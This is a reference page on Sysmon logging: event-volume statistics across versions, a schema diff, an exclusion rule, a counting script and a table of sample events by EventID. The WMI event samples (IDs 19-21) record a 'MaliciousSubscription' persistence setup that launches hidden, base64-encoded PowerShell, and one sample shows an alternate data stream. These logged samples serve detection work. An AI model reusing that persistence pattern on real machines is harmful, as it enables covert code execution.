Sysmon Versions and Events Repartition
Statistics showing the number of events generated over a 5h monitoring period with every Sysmon event type being logged (no filtering in the configuration). Event IDs that are not listed were simply not observed during the sampling.
Sysmon v6.x
```text
Start: 2017-09-20T23:15:04Z
Stop: 2017-09-21T04:04:19Z
TimeLastEvent: 2017-09-21T04:04:18Z
Duration (stop - start): 5h0m0.1474609s
EventCount: 1669855
Average EPS: 92.77 eps
EventIDs:
  1: 116 (0.01 eps)
  2: 6 (0.00 eps)
  3: 186 (0.01 eps)
  5: 115 (0.01 eps)
  6: 4 (0.00 eps)
  7: 5850 (0.32 eps)
  8: 1 (0.00 eps)
  9: 45 (0.00 eps)
  10: 1605725 (89.21 eps)
  11: 271 (0.02 eps)
  12: 50561 (2.81 eps)
  13: 3297 (0.18 eps)
  17: 10 (0.00 eps)
  18: 3668 (0.20 eps)
```
Sysmon v7.x
Diff in Sysmon schemas between v7.0 and v6.1
diff sysmon-v6.1-schema.xml sysmon-v7.0-schema.xml
```diff
1,2c1
<
< <manifest schemaversion="3.4" binaryversion="1.01">
---
> <manifest schemaversion="4.0" binaryversion="1.01">
10a10
> <option switch="s" name="PrintSchema" argument="optional" noconfig="true" exclusive="true" />
17a18
> <option switch="d" name="DriverName" argument="required" />
34a36,39
> <data name="FileVersion" inType="win:UnicodeString" outType="xs:string" />
> <data name="Description" inType="win:UnicodeString" outType="xs:string" />
> <data name="Product" inType="win:UnicodeString" outType="xs:string" />
> <data name="Company" inType="win:UnicodeString" outType="xs:string" />
101a107,110
> <data name="FileVersion" inType="win:UnicodeString" outType="xs:string" />
> <data name="Description" inType="win:UnicodeString" outType="xs:string" />
> <data name="Product" inType="win:UnicodeString" outType="xs:string" />
> <data name="Company" inType="win:UnicodeString" outType="xs:string" />
```
```text
Start: 2018-01-03T18:59:55Z
Stop: 2018-01-03T19:04:46Z
TimeLastEvent: 2018-01-03T19:04:45Z
Duration (stop - start): 5m0.1181641s
EventCount: 264888
Average EPS: 882.61 eps
EventIDs:
  1: 17 (0.06 eps)
  2: 3 (0.01 eps)
  3: 4 (0.01 eps)
  5: 8 (0.03 eps)
  7: 252886 (842.62 eps)
  9: 6 (0.02 eps)
  10: 7673 (25.57 eps)
  11: 139 (0.46 eps)
  12: 3863 (12.87 eps)
  13: 212 (0.71 eps)
  17: 8 (0.03 eps)
  18: 69 (0.23 eps)
```
NB: There is a big increase in ImageLoad events with the latest Sysmon versions. This is caused by the new feature that adds file information (FileVersion, Description, Product, Company) to event IDs 1 and 7: to extract that information, the Sysmon process itself loads every image that gets loaded, or that a created process is started from, and each of those loads generates an ImageLoad event of its own. To prevent this huge volume of events from impacting your workstation/infrastructure, those events need to be excluded in your Sysmon configuration file.
```xml
<!-- Has to be adapted to reflect the path where Sysmon is installed -->
<ImageLoad onmatch="exclude">
  <!-- [...] -->
  <Image condition="is">C:\Windows\Sysmon.exe</Image>
  <!-- [...] -->
</ImageLoad>
```
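To measure what that exclusion buys you on your own data, here is an added example (not code from the original page) that rebuilds the per-EventID count and EPS statistics shown above from Sysmon events exported as JSON lines, and computes the share of ImageLoad events generated by Sysmon.exe itself; the sample events, the 10 s monitoring window and the Sysmon install path are constructed assumptions.

```python
# Added example, not part of the original page: per-EventID stats (as in the
# "EventIDs" listings above) and the share of ImageLoad events from Sysmon.exe.
import json
from collections import Counter
from datetime import datetime, timezone

SYSMON_IMAGE = r"C:\Windows\Sysmon.exe"  # assumption: adapt to the install path
# Constructed sample, one Sysmon event per line (only the fields used here).
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "UtcTime": "2019-06-12 20:17:44.014"}
{"EventID": 7, "Image": "C:\\Windows\\Sysmon.exe", "ImageLoaded": "C:\\Windows\\System32\\svchost.exe", "UtcTime": "2019-06-12 20:17:44.020"}
{"EventID": 7, "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\win32u.dll", "UtcTime": "2019-06-12 20:17:44.440"}
{"EventID": 7, "Image": "C:\\Windows\\Sysmon.exe", "ImageLoaded": "C:\\Windows\\System32\\win32u.dll", "UtcTime": "2019-06-12 20:17:44.445"}
{"EventID": 7, "Image": "C:\\Windows\\Sysmon.exe", "ImageLoaded": "C:\\Windows\\System32\\ntdll.dll", "UtcTime": "2019-06-12 20:17:44.450"}
{"EventID": 10, "Image": "C:\\Windows\\System32\\VBoxService.exe", "UtcTime": "2019-06-12 20:17:45.000"}
{"EventID": 12, "Image": "C:\\Windows\\Sysmon.exe", "UtcTime": "2019-06-12 20:17:46.000"}
{"EventID": 18, "Image": "C:\\Windows\\System32\\RuntimeBroker.exe", "UtcTime": "2019-06-12 20:17:53.895"}
""".strip().splitlines()

def parse_utc(s):
    """Parse Sysmon's UtcTime format, e.g. '2019-06-12 20:17:44.014'."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)

# Constructed 10 s monitoring window (Start/Stop) covering the sample above.
WINDOW_START = parse_utc("2019-06-12 20:17:44.000")
WINDOW_STOP = parse_utc("2019-06-12 20:17:54.000")

def is_sysmon_imageload(ev):
    """True for the ImageLoad events that the exclude rule above drops."""
    return ev["EventID"] == 7 and ev.get("Image", "").lower() == SYSMON_IMAGE.lower()

def event_stats(lines, start, stop, apply_exclude=False):
    """Per-EventID counts and EPS over the [start, stop] window."""
    duration = (stop - start).total_seconds()
    counts = Counter()
    for line in lines:
        ev = json.loads(line)
        if apply_exclude and is_sysmon_imageload(ev):
            continue  # what the <ImageLoad onmatch="exclude"> rule filters out
        counts[ev["EventID"]] += 1
    total = sum(counts.values())
    return {"EventCount": total, "AverageEPS": round(total / duration, 2),
            "EventIDs": {eid: (n, round(n / duration, 2)) for eid, n in sorted(counts.items())}}

def sysmon_share_of_imageload(lines):
    """Fraction of ID 7 events whose loading process is Sysmon.exe itself."""
    loads = [ev for ev in map(json.loads, lines) if ev["EventID"] == 7]
    return sum(is_sysmon_imageload(ev) for ev in loads) / len(loads) if loads else 0.0

print(event_stats(SAMPLE_EVENTS, WINDOW_START, WINDOW_STOP, apply_exclude=True))
```

Run it once without and once with `apply_exclude=True` to see how much of the ImageLoad (ID 7) count and the average EPS disappears once Sysmon.exe's own loads are filtered out.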
Events Table
| EventID | Type | Available Since | Revised In | Example |
|---|---|---|---|---|
| 1 | CreateProcess | - | v7.0, v10 | CommandLine: C:\\Windows\\system32\\svchost.exe -k appmodel -p -s camsvc Company: Microsoft Corporation CurrentDirectory: C:\\Windows\\system32\\ Description: Host Process for Windows Services FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Hashes: SHA1=75C5A97F521F760E32A4A9639A653EED862E9C61,MD5=9520A99E77D6196D0D09833146424113,SHA256=DD191A5B23DF92E12A8852291F9FB5ED594B76A28A5A464418442584AFD1E048,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 Image: C:\\Windows\\System32\\svchost.exe IntegrityLevel: System LogonGuid: {515cd0d1-df83-5d00-0000-0020e7030000} LogonId: 0x3e7 OriginalFileName: svchost.exe ParentCommandLine: C:\\Windows\\system32\\services.exe ParentImage: C:\\Windows\\System32\\services.exe ParentProcessGuid: {515cd0d1-df83-5d00-0000-0010d6620000} ParentProcessId: 608 ProcessGuid: {515cd0d1-33b8-5d01-0000-001024046a00} ProcessId: 10244 Product: Microsoft® Windows® Operating System RuleName: TerminalSessionId: 0 User: NT AUTHORITY\\SYSTEM UtcTime: 2019-06-12 20:17:44.014 |
| 2 | FileCreateTime | - | - | CreationUtcTime: 2017-09-18 07:50:46.104 Image: C:\\Program Files\\Mozilla Firefox\\firefox.exe PreviousCreationUtcTime: 2017-09-19 21:16:37.524 ProcessGuid: 49F1AF32-8663-59C1-0000-001062293400 ProcessId: 1396 TargetFilename: C:\\Users\\Gen Eric\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\BE2KF8TBMP786WCR1WSN.temp UtcTime: 2017-09-19 21:16:37.540 |
| 3 | NetworkConnect | - | - | DestinationHostname: DestinationIp: 192.168.56.1 DestinationIsIpv6: false DestinationPort: 8080 DestinationPortName: Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Initiated: true ProcessGuid: 49F1AF32-8A4D-59C1-0000-001042F00A00 ProcessId: 3888 Protocol: tcp SourceHostname: GenEric-PC SourceIp: 192.168.56.101 SourceIsIpv6: false SourcePort: 49252 SourcePortName: User: NT AUTHORITY\\SYSTEM UtcTime: 2017-09-19 21:25:51.846 |
| 4 | - | - | - | SchemaVersion: 3.40 State: Started UtcTime: 2017-09-19 21:17:08.820 Version: 6.10 |
| 5 | ProcessTerminate | - | - | Image: C:\\Windows\\SysWOW64\\runonce.exe ProcessGuid: 49F1AF32-8956-59C1-0000-001099830200 ProcessId: 2100 UtcTime: 2017-09-19 21:17:12.434 |
| 6 | DriverLoad | - | - | Hashes: SHA1=706C6BB3AD9E24F148EE110984814897383BDC32,MD5=9B38580063D281A99E68EF5813022A5F,SHA256=D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA,IMPHASH=6126B7C1BE78663C7C2231BA8607D577 ImageLoaded: C:\\Windows\\System32\\drivers\\dfsc.sys Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2017-09-19 21:17:01.171 |
| 7 | ImageLoad | - | v7.0, v10 | Company: Microsoft Corporation Description: Win32u FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Hashes: SHA1=F6826F19BB585A1F52F6D2D2B063BFA175AA5B19,MD5=6D9F4B6D13442736A901BF455355AA8A,SHA256=E2F6F0021EFBBFDA3597DCD4F778BC1954138A6289BA9C0EBED360F37E5FAC9B,IMPHASH=00000000000000000000000000000000 Image: C:\\Windows\\System32\\svchost.exe ImageLoaded: C:\\Windows\\System32\\win32u.dll OriginalFileName: ? ProcessGuid: {515cd0d1-33b8-5d01-0000-001024046a00} ProcessId: 10244 Product: Microsoft® Windows® Operating System RuleName: Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2019-06-12 17:17:44.440 |
| 8 | CreateRemoteThread | - | - | NewThreadId: 3384 SourceImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe SourceProcessGuid: 49F1AF32-8955-59C1-0000-00105DF90100 SourceProcessId: 1956 StartAddress: 0x0000000077533860 StartFunction: StartModule: C:\\Windows\\SYSTEM32\\ntdll.dll TargetImage: C:\\Windows\\System32\\wbem\\WmiApSrv.exe TargetProcessGuid: 49F1AF32-89D7-59C1-0000-00106D100A00 TargetProcessId: 3196 UtcTime: 2017-09-19 21:19:20.228 |
| 9 | RawAccessRead | - | - | Device: \\Device\\HarddiskVolume2 Image: C:\\Windows\\System32\\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 UtcTime: 2017-09-19 21:17:01.359 |
| 10 | ProcessAccess | - | - | CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a\|C:\\Windows\\system32\\KERNELBASE.dll+189b7\|C:\\Windows\\System32\\VBoxService.exe+1009d\|C:\\Windows\\System32\\VBoxService.exe+11374\|C:\\Windows\\System32\\VBoxService.exe+1161e\|C:\\Windows\\System32\\VBoxService.exe+e7fb\|C:\\Windows\\System32\\VBoxService.exe+f27b\|C:\\Windows\\System32\\VBoxService.exe+181e\|C:\\Windows\\System32\\VBoxService.exe+2d4af\|C:\\Windows\\System32\\VBoxService.exe+30bd2\|C:\\Windows\\System32\\VBoxService.exe+6c24b\|C:\\Windows\\System32\\VBoxService.exe+6c2df\|C:\\Windows\\system32\\kernel32.dll+159cd\|C:\\Windows\\SYSTEM32\\ntdll.dll+2a561 GrantedAccess: 0x1400 SourceImage: C:\\Windows\\System32\\VBoxService.exe SourceProcessGUID: 49F1AF32-4E56-59BD-0000-00108BCA0000 SourceProcessId: 664 SourceThreadId: 696 TargetImage: C:\\Windows\\system32\\csrss.exe TargetProcessGUID: 49F1AF32-4E55-59BD-0000-0010FB560000 TargetProcessId: 340 UtcTime: 2017-09-19 21:14:34.790 |
| 11 | FileCreate | - | - | CreationUtcTime: 2017-09-07 21:43:40.859 Image: C:\\Windows\\System32\\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 TargetFilename: C:\\pagefile.sys UtcTime: 2017-09-19 21:17:02.343 |
| 12 | RegistryEvent | - | - | EventType: CreateKey Image: C:\\Windows\\Sysmon.exe ProcessGuid: 49F1AF32-4E59-59BD-0000-001021720100 ProcessId: 1332 TargetObject: HKU\\.DEFAULT\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs UtcTime: 2017-09-19 21:14:42.915 |
| 13 | RegistryEvent | - | - | Details: DWORD (0xffffffff) EventType: SetValue Image: C:\\Windows\\system32\\CompatTelRunner.exe ProcessGuid: 49F1AF32-884D-59C1-0000-001093F04800 ProcessId: 616 TargetObject: \\REGISTRY\\A\\{5F82DC26-E525-476B-D7F4-86FAF0C848CE}\\Root\\DeviceCensus\\WU\\AppStoreAutoUpdatePolicy UtcTime: 2017-09-19 21:12:46.212 |
| 14 | RegistryEvent | - | - | EventType: RenameKey Image: C:\\Windows\\regedit.exe NewName: \\REGISTRY\\MACHINE\\SOFTWARE\\Macromedia\\RegistryRenamed ProcessGuid: 49F1AF32-22C3-59C2-0000-001085501200 ProcessId: 3800 TargetObject: HKLM\\SOFTWARE\\Macromedia\\FlashPlayerActiveX UtcTime: 2017-09-20 08:14:21.370 |
| 15 | FileCreateStreamHash | - | - | CreationUtcTime: 2017-09-20 08:06:11.801 Hash: SHA1=17DC34358A2BF7E7D6E78268B3CA7493915BB325, MD5=9D9D384EF6546192D60EFDBB8397CD2D, SHA256=3455A37D9006F5325AC6208E874AE8149FECD8631D981EE78B3AD5B06AD648AB, IMPHASH=00000000000000000000000000000000 Image: C:\\Windows\\system32\\cmd.exe ProcessGuid: 49F1AF32-21E3-59C2-0000-00106B811000 ProcessId: 4000 TargetFilename: C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\test.txt:malicious.txt UtcTime: 2017-09-20 08:10:29.925 |
| 16 | - | - | - | Not Seen |
| 17 | PipeEvent | v6.0 | v10 | EventType: CreatePipe Image: C:\\Program Files\\Whids\\Whids.exe PipeName: <Anonymous Pipe> ProcessGuid: {515cd0d1-33b1-5d01-0000-0010286f6900} ProcessId: 10004 RuleName: UtcTime: 2019-06-12 20:19:19.517 |
| 18 | PipeEvent | v6.0 | v10 | EventType: ConnectPipe Image: C:\\Windows\\System32\\RuntimeBroker.exe PipeName: \\MsFteWds ProcessGuid: {515cd0d1-dfb4-5d00-0000-001013af0900} ProcessId: 5012 RuleName: UtcTime: 2019-06-12 20:17:53.895 |
| 19 | WmiEvent | v6.10 | - | EventNamespace: \"root\\\\CimV2\" EventType: WmiFilterEvent Name: \"MaliciousSubscription\" Operation: Created Query: \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\" User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:00.401 |
| 20 | WmiEvent | v6.10 | - | Destination: \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NonI -W hidden -enc JABHAHIAbwBVAFAAUABvAGwAaQBjAHkAUwBlAFQAVA [...] AkAEsAKQApAHwASQBFAFgA\" EventType: WmiConsumerEvent Name: \"MaliciousSubscription\" Operation: Created Type: Command Line User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:00.431 |
| 21 | WmiEvent | v6.10 | - | Consumer: \"CommandLineEventConsumer.Name=\\\"MaliciousSubscription\\\"\" EventType: WmiBindingEvent Filter: \"__EventFilter.Name=\\\"MaliciousSubscription\\\"\" Operation: Created User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:11.878 |
| 22 | DNSQuery | v10 | - | Image: C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdge.exe ProcessGuid: {515cd0d1-31d1-5d01-0000-001066414800} ProcessId: 5188 QueryName: rawsec.lu QueryResults: ::ffff:62.210.16.62; QueryStatus: 0 RuleName: UtcTime: 2019-06-12 19:08:38.387 |